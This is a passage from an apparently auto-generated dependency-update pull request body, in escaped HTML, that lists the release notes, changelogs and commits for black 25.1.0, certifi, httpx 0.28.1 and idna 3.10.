(truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/black/blob/main/CHANGES.md\"\u003eblack's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e25.1.0\u003c/h2\u003e\n\u003ch3\u003eHighlights\u003c/h3\u003e\n\u003cp\u003eThis release introduces the new 2025 stable style (\u003ca href=\"https://redirect.github.com/psf/black/issues/4558\"\u003e#4558\u003c/a\u003e), stabilizing the following\nchanges:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNormalize casing of Unicode escape characters in strings to lowercase (\u003ca href=\"https://redirect.github.com/psf/black/issues/2916\"\u003e#2916\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix inconsistencies in whether certain strings are detected as docstrings (\u003ca href=\"https://redirect.github.com/psf/black/issues/4095\"\u003e#4095\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eConsistently add trailing commas to typed function parameters (\u003ca href=\"https://redirect.github.com/psf/black/issues/4164\"\u003e#4164\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove redundant parentheses in if guards for case blocks (\u003ca href=\"https://redirect.github.com/psf/black/issues/4214\"\u003e#4214\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd parentheses to if clauses in case blocks when the line is too long (\u003ca href=\"https://redirect.github.com/psf/black/issues/4269\"\u003e#4269\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eWhitespace before \u003ccode\u003e# fmt: skip\u003c/code\u003e comments is no longer normalized (\u003ca href=\"https://redirect.github.com/psf/black/issues/4146\"\u003e#4146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix line length computation for certain expressions that involve the power operator\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4154\"\u003e#4154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCheck if there is a newline before the terminating quotes of a docstring (\u003ca href=\"https://redirect.github.com/psf/black/issues/4185\"\u003e#4185\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix type annotation spacing between \u003ccode\u003e*\u003c/code\u003e and more complex type variable tuple (\u003ca href=\"https://redirect.github.com/psf/black/issues/4440\"\u003e#4440\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe following changes were not in any previous release:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRemove parentheses around sole list items (\u003ca href=\"https://redirect.github.com/psf/black/issues/4312\"\u003e#4312\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eGeneric function definitions are now formatted more elegantly: parameters are split\nover multiple lines first instead of type parameter definitions (\u003ca href=\"https://redirect.github.com/psf/black/issues/4553\"\u003e#4553\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eStable style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix formatting cells in IPython notebooks with magic methods and starting or trailing\nempty lines (\u003ca href=\"https://redirect.github.com/psf/black/issues/4484\"\u003e#4484\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix crash when formatting \u003ccode\u003ewith\u003c/code\u003e statements containing tuple generators/unpacking\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4538\"\u003e#4538\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePreview style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix/remove string merging changing f-string quotes on f-strings with internal quotes\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4498\"\u003e#4498\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCollapse multiple empty lines after an import into one (\u003ca href=\"https://redirect.github.com/psf/black/issues/4489\"\u003e#4489\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrevent \u003ccode\u003estring_processing\u003c/code\u003e and \u003ccode\u003ewrap_long_dict_values_in_parens\u003c/code\u003e from removing\nparentheses around long dictionary values (\u003ca href=\"https://redirect.github.com/psf/black/issues/4377\"\u003e#4377\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMove \u003ccode\u003ewrap_long_dict_values_in_parens\u003c/code\u003e from the unstable to preview style (\u003ca href=\"https://redirect.github.com/psf/black/issues/4561\"\u003e#4561\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePackaging\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eStore license identifier inside the \u003ccode\u003eLicense-Expression\u003c/code\u003e metadata field, see\n\u003ca href=\"https://peps.python.org/pep-0639/\"\u003ePEP 639\u003c/a\u003e. (\u003ca href=\"https://redirect.github.com/psf/black/issues/4479\"\u003e#4479\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up the \u003ccode\u003eis_fstring_start\u003c/code\u003e function in Black's tokenizer (\u003ca href=\"https://redirect.github.com/psf/black/issues/4541\"\u003e#4541\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eIntegrations\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/8a737e727ac5ab2f1d4cf5876720ed276dc8dc4b\"\u003e\u003ccode\u003e8a737e7\u003c/code\u003e\u003c/a\u003e Prepare release 25.1.0 (\u003ca href=\"https://redirect.github.com/psf/black/issues/4563\"\u003e#4563\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/d330deea00e199b99dea59fb4643305408c19a9b\"\u003e\u003ccode\u003ed330dee\u003c/code\u003e\u003c/a\u003e docs: We're not going to use backslashes for the with statement (\u003ca href=\"https://redirect.github.com/psf/black/issues/4564\"\u003e#4564\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/3d8129001f13e8c1a50eb73d8f44d26ad48f9c8c\"\u003e\u003ccode\u003e3d81290\u003c/code\u003e\u003c/a\u003e Move \u003ccode\u003ewrap_long_dict_values_in_parens\u003c/code\u003e to the preview style (\u003ca href=\"https://redirect.github.com/psf/black/issues/4561\"\u003e#4561\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/459562c71a725a0a58a7cb710bd4b68417df4496\"\u003e\u003ccode\u003e459562c\u003c/code\u003e\u003c/a\u003e Improve function declaration wrapping when it contains generic type definitio...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/99dbf3006b30dd77a0f650b25d9b1c8071f25e1e\"\u003e\u003ccode\u003e99dbf30\u003c/code\u003e\u003c/a\u003e Cache executor to avoid hitting open file limits (\u003ca href=\"https://redirect.github.com/psf/black/issues/4560\"\u003e#4560\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/c0b92f3888a004b95e4626d8007a4b259b8f444f\"\u003e\u003ccode\u003ec0b92f3\u003c/code\u003e\u003c/a\u003e Prepare the 2025 stable style (\u003ca href=\"https://redirect.github.com/psf/black/issues/4558\"\u003e#4558\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/e58baf15b99e0202f10bda09447d3eb246e88df9\"\u003e\u003ccode\u003ee58baf1\u003c/code\u003e\u003c/a\u003e Add test for \u003ca href=\"https://redirect.github.com/psf/black/issues/1187\"\u003e#1187\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/psf/black/issues/4559\"\u003e#4559\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/1455ae47311facfaf3ad62d2c223d86ae95c5c68\"\u003e\u003ccode\u003e1455ae4\u003c/code\u003e\u003c/a\u003e Fix docs CI (\u003ca href=\"https://redirect.github.com/psf/black/issues/4555\"\u003e#4555\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/584d0331c8a73785af8a78fa601c540f5fe7bea2\"\u003e\u003ccode\u003e584d033\u003c/code\u003e\u003c/a\u003e fix: Don't remove parenthesis around long dictionary values (\u003ca href=\"https://redirect.github.com/psf/black/issues/4377\"\u003e#4377\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/6e9654065ca5e4b7c7a9491431a6cd7bc4016da3\"\u003e\u003ccode\u003e6e96540\u003c/code\u003e\u003c/a\u003e Fix CI (\u003ca href=\"https://redirect.github.com/psf/black/issues/4551\"\u003e#4551\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/black/compare/24.3.0...25.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `certifi` from 2024.7.4 to 2025.6.15\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/e767d5938eddddf804216cec93a55c85129c5f2d\"\u003e\u003ccode\u003ee767d59\u003c/code\u003e\u003c/a\u003e 2025.06.15 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/357\"\u003e#357\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/3e7076557d66b598fcca462e422dc988f09a6802\"\u003e\u003ccode\u003e3e70765\u003c/code\u003e\u003c/a\u003e Bump actions/setup-python from 5.5.0 to 5.6.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/9afd2ff407b8a0638988c952a6636b8dd623af7c\"\u003e\u003ccode\u003e9afd2ff\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.2.1 to 4.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/d7c816cbc9cf621b3ddc8cd7fa7eda3f36982620\"\u003e\u003ccode\u003ed7c816c\u003c/code\u003e\u003c/a\u003e remove code that's no longer required that 3.7 is our minimum (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/351\"\u003e#351\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/189961379209973abd0dd6304297f03e2359e1b9\"\u003e\u003ccode\u003e1899613\u003c/code\u003e\u003c/a\u003e Declare setuptools as the build backend in pyproject.toml (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/350\"\u003e#350\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/c8741423d67e1025c0bdad5225ded05cf962f207\"\u003e\u003ccode\u003ec874142\u003c/code\u003e\u003c/a\u003e update CI for ubuntu 20.04 deprecation (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/348\"\u003e#348\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/275c9eb55733a464589c15fb4566fddd4598e5b2\"\u003e\u003ccode\u003e275c9eb\u003c/code\u003e\u003c/a\u003e 2025.04.26 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/347\"\u003e#347\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/37883310b51e56570919cdc2d44becc1c6940559\"\u003e\u003ccode\u003e3788331\u003c/code\u003e\u003c/a\u003e Bump actions/setup-python from 5.4.0 to 5.5.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/346\"\u003e#346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/9d1f1b782000baedf57026de5b79e193bcb7ef7b\"\u003e\u003ccode\u003e9d1f1b7\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.1.9 to 4.2.1 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/344\"\u003e#344\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/96b97a5afe26bc1adef98cb0bfe68e34948a73b6\"\u003e\u003ccode\u003e96b97a5\u003c/code\u003e\u003c/a\u003e Bump actions/upload-artifact from 4.6.1 to 4.6.2 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/343\"\u003e#343\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2024.07.04...2025.06.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `httpx` from 0.23.0 to 0.28.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/encode/httpx/releases\"\u003ehttpx's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 0.28.1\u003c/h2\u003e\n\u003ch2\u003e0.28.1 (6th December, 2024)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix SSL case where \u003ccode\u003everify=False\u003c/code\u003e together with client side certificates.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 0.28.0\u003c/h2\u003e\n\u003ch2\u003e0.28.0 (28th November, 2024)\u003c/h2\u003e\n\u003cp\u003eThe 0.28 release includes a limited set of deprecations.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e:\u003c/p\u003e\n\u003cp\u003eWe are working towards a simplified SSL configuration API.\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eFor users of the standard \u003ccode\u003everify=True\u003c/code\u003e or \u003ccode\u003everify=False\u003c/code\u003e cases, or \u003ccode\u003everify=\u0026lt;ssl_context\u0026gt;\u003c/code\u003e case this should require no changes. The following cases have been deprecated...\u003c/em\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003everify\u003c/code\u003e argument as a string argument is now deprecated and will raise warnings.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ecert\u003c/code\u003e argument is now deprecated and will raise warnings.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eOur revised \u003ca href=\"https://github.com/encode/httpx/blob/HEAD/docs/advanced/ssl.md\"\u003eSSL documentation\u003c/a\u003e covers how to implement the same behaviour with a more constrained API.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eThe following changes are also included\u003c/strong\u003e:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe deprecated \u003ccode\u003eproxies\u003c/code\u003e argument has now been removed.\u003c/li\u003e\n\u003cli\u003eThe deprecated \u003ccode\u003eapp\u003c/code\u003e argument has now been removed.\u003c/li\u003e\n\u003cli\u003eJSON request bodies use a compact representation. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3363\"\u003e#3363\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eReview URL percent escape sets, based on WHATWG spec. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3371\"\u003e#3371\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/encode/httpx/issues/3373\"\u003e#3373\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure \u003ccode\u003ecertifi\u003c/code\u003e and \u003ccode\u003ehttpcore\u003c/code\u003e are only imported if required. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3377\"\u003e#3377\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eTreat \u003ccode\u003esocks5h\u003c/code\u003e as a valid proxy scheme. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3178\"\u003e#3178\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCleanup \u003ccode\u003eRequest()\u003c/code\u003e method signature in line with \u003ccode\u003eclient.request()\u003c/code\u003e and \u003ccode\u003ehttpx.request()\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3378\"\u003e#3378\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBugfix: When passing \u003ccode\u003eparams={}\u003c/code\u003e, always strictly update rather than merge with an existing querystring. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3364\"\u003e#3364\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 0.27.2\u003c/h2\u003e\n\u003ch2\u003e0.27.2 (27th August, 2024)\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReintroduced supposedly-private \u003ccode\u003eURLTypes\u003c/code\u003e shortcut. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/2673\"\u003e#2673\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 0.27.1\u003c/h2\u003e\n\u003ch2\u003e0.27.1 (27th August, 2024)\u003c/h2\u003e\n\u003ch2\u003eAdded\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSupport for \u003ccode\u003ezstd\u003c/code\u003e content decoding using the python \u003ccode\u003ezstandard\u003c/code\u003e package is added. Installable using \u003ccode\u003ehttpx[zstd]\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3139\"\u003e#3139\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eImproved error messaging for \u003ccode\u003eInvalidURL\u003c/code\u003e exceptions. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3250\"\u003e#3250\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003eapp\u003c/code\u003e type signature in \u003ccode\u003eASGITransport\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3109\"\u003e#3109\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/encode/httpx/blob/master/CHANGELOG.md\"\u003ehttpx's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.28.1 (6th December, 2024)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix SSL case where \u003ccode\u003everify=False\u003c/code\u003e together with client side certificates.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.28.0 (28th November, 2024)\u003c/h2\u003e\n\u003cp\u003eBe aware that the default \u003cem\u003eJSON request bodies now use a more compact representation\u003c/em\u003e. This is generally considered a prefered style, tho may require updates to test suites.\u003c/p\u003e\n\u003cp\u003eThe 0.28 release includes a limited set of deprecations...\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e:\u003c/p\u003e\n\u003cp\u003eWe are working towards a simplified SSL configuration API.\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eFor users of the standard \u003ccode\u003everify=True\u003c/code\u003e or \u003ccode\u003everify=False\u003c/code\u003e cases, or \u003ccode\u003everify=\u0026lt;ssl_context\u0026gt;\u003c/code\u003e case this should require no changes. The following cases have been deprecated...\u003c/em\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003everify\u003c/code\u003e argument as a string argument is now deprecated and will raise warnings.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ecert\u003c/code\u003e argument is now deprecated and will raise warnings.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eOur revised \u003ca href=\"https://github.com/encode/httpx/blob/master/docs/advanced/ssl.md\"\u003eSSL documentation\u003c/a\u003e covers how to implement the same behaviour with a more constrained API.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eThe following changes are also included\u003c/strong\u003e:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe deprecated \u003ccode\u003eproxies\u003c/code\u003e argument has now been removed.\u003c/li\u003e\n\u003cli\u003eThe deprecated \u003ccode\u003eapp\u003c/code\u003e argument has now been removed.\u003c/li\u003e\n\u003cli\u003eJSON request bodies use a compact representation. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3363\"\u003e#3363\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eReview URL percent escape sets, based on WHATWG spec. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3371\"\u003e#3371\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/encode/httpx/issues/3373\"\u003e#3373\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure \u003ccode\u003ecertifi\u003c/code\u003e and \u003ccode\u003ehttpcore\u003c/code\u003e are only imported if required. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3377\"\u003e#3377\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eTreat \u003ccode\u003esocks5h\u003c/code\u003e as a valid proxy scheme. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3178\"\u003e#3178\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCleanup \u003ccode\u003eRequest()\u003c/code\u003e method signature in line with \u003ccode\u003eclient.request()\u003c/code\u003e and \u003ccode\u003ehttpx.request()\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3378\"\u003e#3378\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBugfix: When passing \u003ccode\u003eparams={}\u003c/code\u003e, always strictly update rather than merge with an existing querystring. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3364\"\u003e#3364\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.27.2 (27th August, 2024)\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReintroduced supposedly-private \u003ccode\u003eURLTypes\u003c/code\u003e shortcut. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/2673\"\u003e#2673\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.27.1 (27th August, 2024)\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSupport for \u003ccode\u003ezstd\u003c/code\u003e content decoding using the python \u003ccode\u003ezstandard\u003c/code\u003e package is added. Installable using \u003ccode\u003ehttpx[zstd]\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3139\"\u003e#3139\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eImproved error messaging for \u003ccode\u003eInvalidURL\u003c/code\u003e exceptions. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3250\"\u003e#3250\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003eapp\u003c/code\u003e type signature in \u003ccode\u003eASGITransport\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3109\"\u003e#3109\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.27.0 (21st February, 2024)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/httpx/commit/26d48e0634e6ee9cdc0533996db289ce4b430177\"\u003e\u003ccode\u003e26d48e0\u003c/code\u003e\u003c/a\u003e Version 0.28.1 (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3445\"\u003e#3445\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/httpx/commit/89599a9541af14bcf906fc4ed58ccbdf403802ba\"\u003e\u003ccode\u003e89599a9\u003c/code\u003e\u003c/a\u003e Fix \u003ccode\u003everify=False\u003c/code\u003e, \u003ccode\u003ecert=...\u003c/code\u003e case. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3442\"\u003e#3442\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/httpx/commit/8ecb86f0d74ffc52d4663214fae9526bee89358d\"\u003e\u003ccode\u003e8ecb86f\u003c/code\u003e\u003c/a\u003e Add test for request params behavior changes (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3364\"\u003e#3364\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3440\"\u003e#3440\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/httpx/commit/0cb7e5a2e736628e2f506d259fcf0d48cd2bde82\"\u003e\u003ccode\u003e0cb7e5a\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 11 updates (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3434\"\u003e#3434\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/httpx/commit/15e21e9ea3cad4f06e22a7e704aabefdf43d2e29\"\u003e\u003ccode\u003e15e21e9\u003c/code\u003e\u003c/a\u003e Updating deprecated docstring Client() class (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3426\"\u003e#3426\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/httpx/commit/80960fa31918d7663c3f4c3ad61661cf0e80628f\"\u003e\u003ccode\u003e80960fa\u003c/code\u003e\u003c/a\u003e Version 0.28.0. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3419\"\u003e#3419\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/httpx/commit/a33c87852b8a0dddc65e5f739af1e0a6fca4b91f\"\u003e\u003ccode\u003ea33c878\u003c/code\u003e\u003c/a\u003e Fix \u003ccode\u003eextensions\u003c/code\u003e type annotation. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3380\"\u003e#3380\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/httpx/commit/ce7e14da27abba6574be9b3ea7cd5990556a9343\"\u003e\u003ccode\u003ece7e14d\u003c/code\u003e\u003c/a\u003e Error on verify as str. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3418\"\u003e#3418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/httpx/commit/47f4a96ffaaaa07dca1614409549b5d7a6e7af49\"\u003e\u003ccode\u003e47f4a96\u003c/code\u003e\u003c/a\u003e Handle empty zstd responses (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3412\"\u003e#3412\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/httpx/commit/189fc4bcbe5f314128775dec66a616ac9a31ad48\"\u003e\u003ccode\u003e189fc4b\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.md, fix typo(s) (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3406\"\u003e#3406\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/encode/httpx/compare/0.23.0...0.28.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 3.7 to 3.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/releases\"\u003eidna's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.10\u003c/h2\u003e\n\u003cp\u003eNo release notes provided.\u003c/p\u003e\n\u003ch2\u003ev3.9\u003c/h2\u003e\n\u003cp\u003eNo release notes provided.\u003c/p\u003e\n\u003ch2\u003ev3.8\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix regression where IDNAError exception was not being produced for certain inputs.\u003c/li\u003e\n\u003cli\u003eAdd support for Python 3.13, drop support for Python 3.5 as it is no longer testable.\u003c/li\u003e\n\u003cli\u003eDocumentation improvements\u003c/li\u003e\n\u003cli\u003eUpdates to package testing using Github actions\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Hugo van Kemenade for contributions to this release.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca 